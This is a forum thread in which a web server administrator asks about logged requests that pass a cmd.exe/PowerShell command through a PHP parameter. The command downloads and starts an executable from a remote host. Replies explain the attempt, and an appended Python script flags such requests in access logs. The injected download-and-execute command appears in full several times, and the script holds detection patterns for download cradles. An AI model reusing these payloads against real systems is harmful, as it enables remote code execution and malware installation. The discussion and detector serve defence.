powershell exploit attempt

trojan81
I've noticed that all of my web servers were logging this block below from my host intrusion prevention system. For privacy, assume this particular webserver has a dns name of zeus.xyzcorp.com

zeus.xyzcorp.com/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe

Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targeting?
Jose Gabriel Ortega Castro, Top Rated Freelancer on MS Technologies
Commented:
It's trying to download "http://a46.bulehero.in/download.exe" as "C:\8.exe" and start the 8.exe.
I (out of curiosity) just tried the http://a46.bulehero.in/download.exe in my browser and it doesn't bring anything (404 error), so I'm unable to answer that :)

I think it is somehow trying to run CMD from your PHP page and then PowerShell to run that.

Author

Commented:
Jose, try this one

public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fuckyou.com/fuckyou.exe','C:/12.exe');start%20C:/12.exe

Author

Commented:
Whatever it is doing, my webserver is not vulnerable so it didn't execute anything. I'm curious which vulnerability it is targeting.
Jose Gabriel Ortega Castro, Top Rated Freelancer on MS Technologies

Commented:
Same 404 :)
Qlemo "Batchelor", Developer and EE Topic Advisor
Commented:
It's a very primitive attack, but I'm unable to find anything similar, so I cannot tell about the details. No website should execute arbitrary code using a PHP script, so being vulnerable is unlikely.

Author

Commented:
Jose/Qlemo,

Would you say that it is trying to invoke powershell to download and run the file?
Qlemo "Batchelor", Developer and EE Topic Advisor

Commented:
Yes, but that would require running PHP code in hydra.php located in your web site's public folder. Maybe a reference to http://www.markus-lanthaler.com/hydra/, and the crafted (cheap) attack is based on that API?
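A small triage script for log lines like the one in the question, added here as an example and not code from the thread or from any product: it URL-decodes each query parameter and flags a request only when a shell invocation is combined with a download cradle or a launch of the dropped file, then pulls out the remote URL and local drop path for blocking and hunting. The sample request lines are constructed (the first mirrors the question's log entry, with the question's placeholder host); the indicator patterns and function names are my own.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample request lines (not from the original thread), modelled on the
# request quoted in the question; "zeus.xyzcorp.com" is the question's placeholder host.
SAMPLE_REQUESTS = [
    "zeus.xyzcorp.com/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20"
    "System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');"
    "start%20C:/8.exe",
    "zeus.xyzcorp.com/public/index.php?page=about",
    "zeus.xyzcorp.com/public/search.php?q=powershell%20tutorial",
]

# Indicators of a query parameter carrying a shell-to-PowerShell download-and-execute chain.
INDICATORS = {
    "shell_invocation": re.compile(r"\bcmd(\.exe)?\s+/c\b|\bpowershell(\.exe)?\b", re.I),
    "download_cradle": re.compile(r"system\.net\.webclient|downloadfile|downloadstring|invoke-webrequest", re.I),
    "exec_after_drop": re.compile(r"\b(start|invoke-expression|iex)\b\s", re.I),
}
REMOTE_URL = re.compile(r"https?://[^\s'\"()]+", re.I)
DROPPED_PATH = re.compile(r"\b[a-z]:[\\/][^\s'\"();,]+", re.I)

def decode_query_values(request: str) -> dict:
    """Return {param: value}, URL-decoded. Split on '&' only: the payload contains ';',
    which older parse_qs versions also treated as a separator and would truncate."""
    query = urlsplit("http://" + request).query
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params

def analyze_request(request: str) -> dict:
    """Decode one request line and report which indicators fire, and on which parameter."""
    hits, urls, paths = {}, [], []
    for name, value in decode_query_values(request).items():
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.setdefault(label, []).append(name)
        urls += REMOTE_URL.findall(value)
        paths += DROPPED_PATH.findall(value)
    # A lone "powershell" in a search box is not an attack: require a shell plus a cradle or launch.
    suspicious = "shell_invocation" in hits and ("download_cradle" in hits or "exec_after_drop" in hits)
    return {"path": urlsplit("http://" + request).path, "hits": hits, "suspicious": suspicious,
            "remote_urls": sorted(set(urls)), "dropped_paths": sorted(set(paths))}

def triage(requests) -> list:
    """Keep only the requests that look like command-injection attempts, with their indicators."""
    return [r for r in map(analyze_request, requests) if r["suspicious"]]
```

Run `triage` over decoded access-log request lines; the `remote_urls` and `dropped_paths` of each flagged entry are the values to feed into egress blocking and endpoint hunting.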